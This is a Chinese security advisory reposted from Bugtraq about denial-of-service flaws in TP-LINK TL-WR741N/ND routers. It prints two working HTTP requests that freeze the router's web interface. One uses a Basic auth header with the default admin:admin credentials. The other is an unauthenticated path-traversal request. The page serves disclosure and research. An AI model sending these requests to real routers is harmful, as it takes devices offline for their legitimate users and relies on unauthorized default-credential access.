Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / TP-LINK TL-WR741N/TL-WR741ND路由器多个拒绝服务漏洞

发布日期:2013-04-19
更新日期:2013-04-24受影响系统:
TP-LINK TL-WR741N
TP-LINK TL-WR741ND
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59325
 
TP-LINK TL-WR741N、TL-WR741ND是150mbps无线路由器。
 
TP-LINK TL-WR741N、TL-WR741ND在实现上存在多个拒绝服务漏洞,其中一个漏洞需要攻击者经过身份验证,另外一个无需经过身份验证,这些漏洞可造成设备远程被冻结,拒绝服务合法用户。
 
<*来源:W1ckerMan
 
 链接:http://packetstormsecurity.com/files/121359/tplink-freezedos.txt
       http://www.exploit-db.com/exploits/24504/
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1 - FREEZING TP-LINK WEB INTERFACE (You need to be autenticated)
 
//You need the line Authorization: Basic YWRtaW46YWRtaW4=
 //maybe admin admin ????
 GET http://192.168.1.1:80/userRpm/DdnsAddRpm.htm?provider=4 HTTP/1.1
 Host: 192.168.1.1
 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.1.1/userRpm/DdnsAddRpm.htm?provider=4
 Authorization: Basic YWRtaW46YWRtaW4=
 
2 - FREEZING TP-LINK WEB INTERFACE (You don"t need autentication)
 
GET http://192.168.1.1:80/help/../../root HTTP/1.1
 Host: 192.168.178.2
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.1.1/help/建议:
--------------------------------------------------------------------------------
厂商补丁:
 
TP-LINK
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.tp-link.com/en/support/download/libxmp "get_dsmp()"函数远程缓冲区溢出漏洞Cisco Unified Contact Center Express脚本编辑器信息泄露漏洞(CVE-2013-1214)相关资讯      TP-LINK安全漏洞 
  • TP-Link TL-SC3171网络摄像机多个  (08/03/2013 14:31:21)
  • TP-Link TL-SC3171网络摄像机远程  (08/02/2013 10:04:58)
  • TP-LINK TL-PS110U打印服务器"  (06/23/2013 07:05:32)
  • TP-Link TL-SC3171网络摄像机多个  (08/03/2013 14:30:54)
  • TP-Link TL-SC3171网络摄像机任意  (08/02/2013 09:59:02)
  • TP-LINK TL-SC3171 IP Camera身份  (06/15/2013 08:09:54)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图